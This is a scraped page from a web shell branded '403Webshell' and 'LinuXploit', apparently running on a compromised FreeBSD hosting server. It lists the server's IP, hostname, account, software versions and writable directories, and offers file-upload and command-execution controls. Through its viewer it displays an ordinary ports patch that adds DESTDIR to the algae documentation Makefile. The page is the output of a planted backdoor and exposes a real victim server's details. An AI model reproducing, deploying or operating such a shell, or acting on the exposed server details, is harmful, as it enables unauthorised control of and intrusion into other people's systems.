403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/math/algae/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/math/algae/files/patch-doc-Makefile.in
--- doc/Makefile.in.orig
+++ doc/Makefile.in
@@ -173,15 +173,13 @@
 install: algae.info algae.1 algae_toc.html index.html info.db
 	-if test -f algae.info; then d=.; else d=$(srcdir); fi; \
 	for f in $$d/algae.info $$d/algae.info-*; do \
-	  $(INSTALL_DATA) $$f $(infodir); \
-	done; \
-	if $(SHELL) -c 'install-info --version' > /dev/null 2>&1; then \
-	  install-info --info-dir=$(infodir) $$d/algae.info; else true; fi
+	  $(INSTALL_DATA) $$f $(DESTDIR)$(infodir); \
+	done
 	-if test -f algae_toc.html; then d=.; else d=$(srcdir); fi; \
 	for f in $$d/index.html $$d/algae*.html $$d/icon.gif $$d/info.db; do \
-	  $(INSTALL_DATA) $$f $(htmldir); done
-	-rm -f $(datadir)/algae/html; ln -s $(htmldir) $(datadir)/algae/html
-	-$(INSTALL_DATA) algae.1 $(mandir)/algae.$(manext)
+	  $(INSTALL_DATA) $$f $(DESTDIR)$(htmldir); done
+	-rm -f $(DESTDIR)$(datadir)/algae/html; ln -s $(htmldir) $(DESTDIR)$(datadir)/algae/html
+	-$(INSTALL_DATA) algae.1 $(DESTDIR)$(mandir)/algae.$(manext)
 
 uninstall:
 	rm -f $(infodir)/algae.info* $(mandir)/algae.$(manext) \

Youez - 2016 - github.com/yon3zu
LinuXploit